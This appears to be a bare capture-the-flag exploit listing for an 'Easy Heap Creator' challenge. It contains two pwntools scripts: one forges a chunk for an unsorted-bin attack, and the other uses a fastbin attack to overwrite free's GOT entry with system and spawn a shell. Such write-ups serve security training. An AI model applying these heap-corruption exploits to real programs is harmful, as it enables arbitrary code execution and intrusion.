1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115
| Congrt ! cat: /home/pwn/flag: No such file or directory -------------------------------- Easy Heap Creator -------------------------------- 1. Create a Heap 2. Edit a Heap 3. Delete a Heap 4. Exit -------------------------------- Your choice :$
def Add(size,content): sla('choice :',str(1)) sla('Size of Heap : ',str(size)) sla('Content of heap:',content)
def Edit(index,size,content): sla('choice :',str(2)) sla('Index :',str(index)) sla('Size of Heap : ',str(size)) sla('Content of heap : ',content)
def Del(index): sla('choice :',str(3)) sla('Index :',str(index))
def catflag(): sla('choice :',str(0x1305))
Add(0x20,b'aaaa') Add(0x80,b'aaaa') Add(0x20,b'aaaa')
Del(1)
target = 0x006020C0 fd = 0 bk = target - 0x10 prev_size = 0 fake_chunk_size = 0x91
fake_chunk = p(prev_size) + p(fake_chunk_size) fake_chunk += p(fd) + p(bk)
payload = cyclic(0x20) payload += fake_chunk
Edit(0,len(payload),payload) Add(0x80,b'bbbb')
catflag()
def Add(size,content): sla('choice :',str(1)) sla('Size of Heap : ',str(size)) sla('Content of heap:',content)
def Edit(index,size,content): sla('choice :',str(2)) sla('Index :',str(index)) sla('Size of Heap : ',str(size)) sla('Content of heap : ',content)
def Del(index): sla('choice :',str(3)) sla('Index :',str(index))
def catflag(): sla('choice :',str(0x1305))
Add(0x60,'TY') Add(0x60,'TY')
Del(1)
fake_thunk = 0x06020B0 - 3 fake_thunk_prev_siez = 0 fake_thunk_siez = 0x71
chunk0 = junk(0x60)
payload = chunk0 payload += p(fake_thunk_prev_siez) + p(fake_thunk_siez) payload += p(fake_thunk) Edit(0,len(payload),payload)
Add(0x60,'sh\x00') Add(0x60,'aaaa')
free_got = elf.got['free']
note_arrary = 0x06020E0
num = note_arrary - (fake_thunk + 0x10)
payload = junk(num) payload += p(free_got) Edit(2,len(payload),payload)
sysaddr = elf.plt['system'] payload = p(sysaddr)
Edit(0,len(payload),payload) Del(1)
|